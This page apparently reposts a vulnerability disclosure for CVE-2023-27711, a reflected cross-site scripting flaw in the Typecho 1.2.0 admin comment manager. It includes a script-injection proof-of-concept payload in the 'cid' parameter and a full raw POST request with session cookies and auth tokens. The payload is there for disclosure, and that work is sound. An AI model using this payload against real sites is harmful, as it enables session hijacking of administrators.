Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-27711: Typecho <= 1.2.0 Comment Manager with Refleted-XSS Vulnerability · Issue #1539 · typecho/typecho

Cross Site Scripting vulnerability found in Typecho v.1.2.0 allows a remote attacker to execute arbitrary code via the Comment Manager /admin/manage-comments.php component.

CVE
Open in Source
#xss#vulnerability#web#mac#apple#intel#php#auth#chrome#webkit

Typecho <= 1.2.0 Comment Manager with Refleted-XSS Vulnerability****Influenced Version

Typecho <= 1.2.0

Description

Typecho admin backend comment manager with refleted-XSS vulnerability…

  1. Login to admin backend management system.
  2. In Comment Manager /admin/manage-comments.php, the unfiltered request parameter cid is directly echoed to html.

POC

POST /admin/manage-comments.php with:

coid[]=1&cid="><script>alert(1)</script><!--

The full POC request:

POST /cms/typecho/admin/manage-comments.php?status=wating&category=&keywords=abc&__typecho_all_posts=off&uid= HTTP/1.1 Host: 192.168.0.10 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.0.10/cms/typecho/admin/login.php?referer=http%3A%2F%2F192.168.0.10%2Fcms%2Ftypecho%2Fadmin%2Fmanage-comments.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: 745020ecd4b17dde48d43755702a78b4__typecho_uid=1; 745020ecd4b17dde48d43755702a78b4__typecho_authCode=%24T%249aGUcl7K02f405471bbdacf65892bf8ffb75bc211; PHPSESSID=m7h7isuus6cugk6mb58vdah296; u5DD_2132_saltkey=ql9191Ym; u5DD_2132_lastvisit=1677486351; u5DD_2132_seccodecSASGLE52ETX=1.1b4fba6d0be0f7dce2; u5DD_2132_ulastactivity=dd6b5bfUH2dwkFNJ5HnOvs2bnRKl16bY2TMsiYWsOsPOeru7pyMl; u5DD_2132_auth=ade9wjKb33QiAdI8RrnDloFyK4vB8ca3sx7pIgT0BNlWPo1CeA%2Bsk87ST8rZ%2FVqZTdeIhOInVMfZCF8zm7uu; u5DD_2132_lastcheckfeed=1%7C1677489964; u5DD_2132_nofavfid=1; u5DD_2132_home_diymode=1; u5DD_2132_visitedfid=2; u5DD_2132_smile=1D1; u5DD_2132_home_readfeed=1677497943; u5DD_2132_forum_lastvisit=D_2_1677498054; u5DD_2132_st_t=1%7C1677498055%7C9149ebde1ec47006277ae3faf93f0e2f; u5DD_2132_editormode_e=1; u5DD_2132_st_p=1%7C1677498095%7C926ebc78300a154f5ad9ebb023eb0b77; u5DD_2132_viewid=tid_1; u5DD_2132_seccode=5.792e3c6d8b004d4403; u5DD_2132_seccodecSE52ETX=6.a73b7daa353701b59a Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 44

coid[]=1&cid="><script>alert(1)</script><!–

Reported by Srpopty, vulnerability discovered by using Corax.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE